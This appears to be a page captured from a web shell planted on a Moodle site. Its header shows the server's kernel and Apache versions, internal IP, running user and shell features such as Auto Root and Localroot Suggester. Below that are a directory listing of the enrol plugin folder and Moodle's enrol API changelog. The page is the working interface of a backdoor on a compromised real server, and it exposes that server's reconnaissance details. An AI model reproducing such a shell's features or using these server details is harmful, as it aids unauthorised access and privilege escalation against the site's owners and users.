Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
sipdm.cesa.co.za /
enrol /
Delete
Unzip
Name
Size
Permission
Date
Action
category
[ DIR ]
drwxr-sr-x
2017-06-22 16:04
cohort
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
database
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
flatfile
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
guest
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
imsenterprise
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
ldap
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
lti
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
manual
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
meta
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
mnet
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
paypal
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
self
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
tests
[ DIR ]
drwxr-sr-x
2017-06-22 16:05
yui
[ DIR ]
drwxr-sr-x
2017-06-22 15:48
README.txt
245
B
-rw-r--r--
2017-06-22 16:05
ajax.php
5.27
KB
-rw-r--r--
2017-06-22 16:04
bulkchange.php
3.37
KB
-rw-r--r--
2017-06-22 16:04
bulkchange_forms.php
4.4
KB
-rw-r--r--
2017-06-22 16:04
editenrolment.php
3.72
KB
-rw-r--r--
2017-06-22 16:05
editenrolment_form.php
2.79
KB
-rw-r--r--
2017-06-22 16:05
editinstance.php
3.43
KB
-rw-r--r--
2017-06-22 16:05
editinstance_form.php
2.73
KB
-rw-r--r--
2017-06-22 16:05
externallib.php
42.55
KB
-rw-r--r--
2017-06-22 16:05
index.php
3.89
KB
-rw-r--r--
2017-06-22 16:05
instances.php
13.14
KB
-rw-r--r--
2017-06-22 16:05
locallib.php
54.39
KB
-rw-r--r--
2017-06-22 16:05
otherusers.php
3.59
KB
-rw-r--r--
2017-06-22 16:05
renderer.php
27.8
KB
-rw-r--r--
2017-06-22 16:05
test_settings.php
2.48
KB
-rw-r--r--
2017-06-22 16:05
unenroluser.php
3.23
KB
-rw-r--r--
2017-06-22 16:05
upgrade.txt
3.42
KB
-rw-r--r--
2017-06-22 16:05
users.php
11.56
KB
-rw-r--r--
2017-06-22 16:05
users_forms.php
6.94
KB
-rw-r--r--
2017-06-22 16:05
Save
Rename
This files describes API changes in /enrol/* - plugins, information provided here is intended especially for developers. === 3.2 === * External function core_enrol_external::get_users_courses now return the category id as an additional optional field. === 3.1 === * core_enrol_external::get_enrolled_users now supports two additional parameters for ordering: sortby and sortdirection. * Enrolment plugins UI have been consolidated. Plugins can implement use_standard_editing_ui() function and add edit_instance_form() and edit_instance_validation() methods instead of providing their own edit.php and form. They can then rely on the default implementation of get_action_icons and get_course_navigation. In future this will mean they can be called by webservices/user upload tools because they can validate their data. === 3.0 === * Added new events enrol_instance_created, enrol_instance_updated and enrol_instance_deleted . Always trigger them when changing records in the DB table 'enrol'. * Constant CACHE_COURSE_CONTACTS_TTL was deleted. * External function core_enrol_external::get_enrolled_users now returns only the viewable participants if the course has groups enabled and no groupid is passed. === 2.9 === * External function core_enrol_external::get_users_courses now returns additional optional fields: - summary: Course summary. - summaryformat: Course summary format. - format: Course format. - showgrades: True if grades are shown, otherwise false. - lang: Forced course language. - enablecompletion: Control or not via completion and activity settings. === 2.8 === * enrol_plugin::instance_deleteable() is deprecated and has been replaced by enrol_plugin::can_delete_instance() * enrol_plugin::can_hide_show_instance() is a new function to control who can hide/show enrolment instances. Returns true by default but plugins must implement their own logic. === 2.6 === * Enrolment plugin which supports self enrolment should implement can_self_enrol() * Enrolment plugin should implement get_enrol_info() to expose instance information with webservice or external interface. * Webservice core_enrol_get_enrolled_users_with_capability was incorrectly specifing float as the return type for user id. int is the actual returned type and is now reported as such. === 2.5 === * plugins may use general enrol/editenrolment.php page to let users edit enrolments manually * new support for grade recovery in enrol_plugin::enrol_user() method === 2.4 === required changes in code: * use role_get_name() or role_fix_names() if you need any role names, using role.name directly from database is not correct any more * new restore support: ENROL_RESTORE_EXACT, ENROL_RESTORE_NOUSERS and ENROL_RESTORE_CLASS were removed, implement new restore_* plugin methods instead other changes and new features: * course enrolment manager now works with disabled plugins too * new support for protected group membership linked to enrol instance * new support for expiry notifications - see enrol_plugin::send_expiry_notifications() method === 2.2 === required changes in code: * load_temp_role() is deprecated, use load_temp_course_role() instead, temp role not loaded * remove_temp_role() is deprecated, use remove_temp_course_roles() instead * 'user_unenrol_modified' event was renamed to 'user_enrol_modified' === 2.0 === required changes in code: * enrolment plugins need to be rewritten to use new API - see inline phpdocs and official plugins